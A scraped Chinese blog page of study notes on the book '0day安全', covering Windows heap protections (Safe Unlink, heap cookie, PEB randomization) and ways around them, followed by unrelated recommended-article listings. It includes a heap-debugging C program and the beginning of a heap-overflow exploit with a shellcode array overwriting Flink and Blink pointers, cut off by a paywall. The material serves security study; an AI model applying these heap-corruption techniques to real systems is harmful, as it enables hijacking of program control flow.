《0day安全》——重重保护下的堆

最新推荐文章于 2022-09-20 00:19:16 发布
最新推荐文章于 2022-09-20 00:19:16 发布
阅读量283 收藏 2
点赞数
分类专栏: 漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunr_/article/details/108330794
版权
本文探讨了堆的保护方式,包括PEB random、Safe Unlink和heap cookie等,以及如何绕过这些防护进行堆溢出攻击。通过 chunk 重设大小和利用Lookaside表,详细阐述了攻击策略,并解释了如何利用堆溢出控制异常处理函数指针,以实现程序流程的劫持。
摘要由CSDN通过智能技术生成

堆保护方式

 1.PEB random:dword shoot写内存,覆盖PEB指针,加入随机化了就不行了。
 2.Safe Unlink:验证当前堆块的下一个堆块的前向指针和前一个堆块的后向指针是否指向当前堆块。
 3.heap cookie:跟栈的GS类似,cookie放在segment table处,占一个字节。
 4.元数据加密:块首一些重要元素与一个4字节的随机数进行异或运算,使用时再异或回来,我们就不能直接破坏或改写这些数据了。

攻击堆中存储的变量

堆中的各项保护措施是对堆块的关键结构进行保护,而对于堆中存储的内容是不保护的。如果堆中存放着一些重要的数据或结构指针,如函数指针等内容,通过覆盖这些重要的内容还是可以实现溢出的。这种攻击手段与堆保护措施没有什么联系。

利用 chunk 重设大小攻击堆

#include "stdafx.h"
#include <stdio.h>
 #include <windows.h>
 void main()
 {
   
	HLOCAL h1;
	HANDLE hp;
	hp = HeapCreate(0,0x1000,0x10000);
	__asm int 3
	h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
 }

在这里插入图片描述
分配空间和 chunk 头构建的过程对于我们来说没有什么利用价值,所以跳过这部分,直接进入到将新 chunk 插入链表的过程。
在这里插入图片描述
在这里插入图片描述
将这一过程归纳成公式则如下所示:
新 chunk->Flink=旧 chunk->Flink
新 chunk->Blink=旧 chunk->Flink->Blink
旧 chunk->Flink->Blink->Flink=新 chunk
旧 chunk->Flink->Blink=新 chunk

#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
void main()
{
   
	char shellcode[]=
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x10\x01\x10\x00\x99\x99\x99\x99"
	"\xEB\x06\x39\x00\xEB\x06\x39\x00"//覆盖 Flink 和 Blink
	"\x90\x90\x90\x90\x90\x90\x90
最低0.47元/天 解锁文章
sunr_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C/C++教程 第九章 —— windows编程入门
余识-
07-23 5493
本文是C/C++教程的第九章,介绍了Windows编程的基础知识,包括创建窗口的过程、使用WinAPI函数、消息循环和回调函数。通过实例详细讲解如何从零开始创建一个简单的Windows窗口程序,强调了理解Windows消息机制的重要性,并提供了完整代码示例。
【Pygamex小游戏】抗疫情,居家乐——在家无聊来玩儿像素鸟闯关大冒险吧,猜猜你能闯到多少关?
xy258009的博客
04-14 2669
前言 大家好,我是栗子君。 疫情期间,大家更要保持乐观积极的心态,不是吗? 所以小编今天给大家分享一个使用pygame代码制作的像素鸟小游戏! 期待疫情早日结束,杨帆起飞🛫~ 这款《像素鸟》是一款像素敏捷类游戏,玩家点击按键,使小鸟飞起然后降,不断地前 进穿越重重障碍,最终根据条件获取胜利。今天我们就来分析具体的代码吧~ 正文 一)运行环境 本文用到的环境:Python3.6、Pycharm社区版、Pygame游戏模块自带的就不展示啦。 pip install -i https
0day安全操作
sunr_的博客
08-25 270
0day2》操作 的调试 #include "stdafx.h" #include <windows.h> int main() { HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); __asm int 3 h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,3); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,5); h3 = Heap
重重保护下的
dengyao6547的博客
08-09 107
保护机制的原理   PEB random:在Windows XP SP2之后,将PEB基地址前两个字节随机化。   Safe Unlink:在SP2 之前的链表拆卸操作类似于如下代码:    int remove (ListNode * node)   (     node -> blink->flink = node->flink; ...
记录学习《0Day安全》路上遇到的问题解决方案: 阶段性总结-重重保护下的
Z_LiT0的博客
05-06 642
if __author__ == "lit0":0x00 前言转眼学习这本书已经到了第一篇末尾最后一章也是较难的一章,虽然没有碰到什么大问题,不合这个系列标题所说的问题解决方案,但还是写一些自己学习的一些理解,尤其是。很有趣啊! 记录一下关于的一些理解0x01正文- 利用chunk重设大小攻击1.原理 - safe unlink 微软对于双向链表的释放做了验证(验证释放时前后指针是否
0day安全》——亡羊补牢:SafeSEH
sunr_的博客
08-27 337
启用该链接选项后,编译器在编译程序的时候将程序所有的异常处理函数地址提取出来,编入一张安全 S.E.H 表,并将这张表放到程序的映像里面。当程序调用异常处理函数的时候会将函数地址与安全 S.E.H 表进行匹配, 检查调用的异常处理函数是否位于安全 S.E.H 表中。 攻击返回地址绕过SafeSEH 没开GS,开了SafeSEH,直接攻击函数返回地址 利用虚函数绕过SafeSEH 不涉及异常处理,SafeSEH没有参与感 从中绕过SafeSEH ...
0Day安全》之溢出
binghupo的博客
12-05 7837
最近重读《0Day安全》,由于栈溢出比较简单,所以直接从溢出开始读起。 在学习溢出之前,需要读者对的结构有一定的了解。先写一个小程序,分配一个新的来供我们研究它的结构,代码如下 #include #include int main() { HLOCAL h1, h2, h3, h4, h5, h6; HANDLE hp = NULL; hp = HeapCreate(
Day4:应用层——FTP :文件传输协议、电子邮件(EMail)、DNS(Domain Name System)、P2P应用(一类应用)
热门推荐
m0_46156900的博客
02-13 1万+
一、FTP文件传输协议  向远程主机上传输文件或从远程主机接收文件  客户/服务器模式  客户端:发起传输的一方  服务器:远程主机  ftp: RFC 959  ftp服务器:端口号为21 1.FTP: 控制连接与数据连接分开  FTP客户端与FTP服务器通过端21联系,并使用TCP为传输协议  客户端通过控制连接获得身份确认 (Client发起TCP控制连接,用户名、口令,明文传输)  客户端通过控制连接发送命令浏览远程目录 (list 、download 、upload) 
【逻辑思考】你相信命运吗?
无知人生,记录点滴
07-07 2387
我们都希望预知自己未来的命运,个人认为像算命这种,如果有什么科学依据,那应该也是基于统计学的应用。算命就像是人生路上的天气预报,根据已知的(如你的优点缺点……)看你的未来(比如:做什么比较有发展);就像两军对战,知己知彼才对胜负有清晰的判断;而人在这个世界上,在整个宇宙中是多么渺小的存在,大环境产生大影响(个人要顺应大的趋势),个人产生微小的影响,而个十百千万亿N的积累起来又可能产生大的影响;这又是宏观到微观,微观到宏观,宏观制约微观,微观的积累放大又影响或形成宏观。
0day安全》——格式化字符串漏洞
sunr_的博客
08-26 227
printf中的缺陷 #include "stdafx.h" #include <stdio.h> int main() { int a=44, b=77; printf("a=%d, b=%d\n", a, b); printf("a=%x, b=%d\n"); return 0; }   环境 备注 操作系统 Windows2000 其他32位系统也可以 编译器 vc++6.0   编译选项 默认 build release版本
Windows安全机制---栈保护:GS机制
每昔的博客
10-08 5148
文章目录Windows安全机制 Windows安全机制 GS编译技术 SEH的安全校验机制 Heap Cookie,Safe Unlinking等一系列安全机制 DEP数据执行保护 ASLR加载地址随机 SEHOP SEH的覆盖保护 ...
0day安全:软件漏洞分析技术》的一点总结
whatday的专栏
01-14 1691
评价 首先评价一下这本书吧:(先抑后扬吧)  有些漏洞是win2000的,实在是太老了,难以进行实践,但是介绍一下也是很好的,但是不能实践理解得不深刻。【第一版是08年出版的,第二版是2011年,我手上的是第二版,这2014年,xp都停止服务啦(xp用着还是挺爽的哦)】 从基础的漏洞利用原理,到漏洞挖掘的技术(其实基本都是举例子),到内核,最后接近10个分析案例,相对来说还是比较全面的了,在...
溢出攻击(XP SP2 - 2003)
whatday的专栏
01-15 1426
微软在中也增加了一些安全校验操作,使得原本是不容易的溢出变得困难重重: * PEB Random:在 Windows XP SP2 之后,微软不再使用固定的 PEB 基址 0x7FFDF000,而是使用具有一定随机性的基址,从而影响了 DWORD SHOOT 对 PEB 中函数的攻击。 * Safe Unlink:微软改写了操作双向链表的代码,在卸载 free list 中的块时更加小心...
缓冲区溢出保护机制——Windows
weixin_30654583的博客
03-11 400
缓冲区溢出保护机制 Windows GS安全编译选项 Visual Studio 2003及以后版本的Visual Studio中默认启用了这个安全编译选项。 GS编译选项为每个函数增加了一些额外的数据和操作: 1、在所有函数调用发生时,向栈帧内压入一个额外的随机DWORD,这个随机数被称作“canary”,用IDA反汇编时,又被称作“Security Cookie”。 2、canar...
溢出科普:heap overflow&溢出保护和绕过
weixin_34320724的博客
03-08 1778
pr0mise · 2016/04/11 9:500x00 第一部分:heap overflow接上文,来看另外一种溢出方式:溢出.相对于栈溢出来说,稍微麻烦一点本文算是一个笔记,技术有限,难免有纰漏之处,欢迎诸君斧正.0x01 基础知识一.的结构为程序运行时主动申请的内存,通常称为区,操作的api从UserMode来看有:例如malloc申请一块内存会先调用HeapCreate()为自...
【读书笔记】《0day安全》第二章:栈溢出的原理和实践
最新发布
人间体佐菲的博客
09-20 573
缓冲区溢出,栈溢出,网络安全,渗透测试,0day挖掘
0day安全-软件漏洞分析技术】笔记
小张同学的博客
03-24 4120
C1 基础知识 1.1.3 漏洞分析和利用 漏洞挖掘:实际上是高级测试QA。工程界常用fuzz;学术界用静态分析。 漏洞分析:找到POC(proof of concept)代码,无法获得POC时,利用厂商提供的漏洞描述,使用补丁比较器,比较patch前后的修改,再利用反汇编工具进行逆向分析。 漏洞利用:缓冲区溢出;内存漏洞(栈溢出),web漏洞(脚本注入) 1.1.4 漏洞公布 CVE:cve.mitre.org cert:cert.org 微软安全中心 每月 第二周 的 周二发布补丁 1.2 二进制
Windows漏洞利用与防护(2015.8)
weixin_30950237的博客
05-02 767
Windows平台下的漏洞利用与防护 0x00 概述 在过去的二十几年,Windows作为网络安全的主战场之一,攻于防的较量从未停息过。内存破坏漏洞作为研究的重点之一,经历了很多的发展也沉淀了前辈们许多经验和智慧。 本人根据大牛们的各种报告总结了目前Windows平台上内存破坏漏洞利用与防护的发展史,接下来会从应用层和内核层两个方面逐一介绍。 先来看一下总的架构图: 0x01 用户层 应用层漏洞...
0day安全:软件漏洞分析技术》第2版——深入探讨Windows平台安全
"0day+安全:软件漏洞分析技术(第2版)" 本书"0day+安全:软件漏洞分析技术(第2版)"是一部深入探讨网络安全领域中0day漏洞的专业著作,尤其专注于Windows平台的缓冲区溢出漏洞分析、检测与防护。全书共分为五篇...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值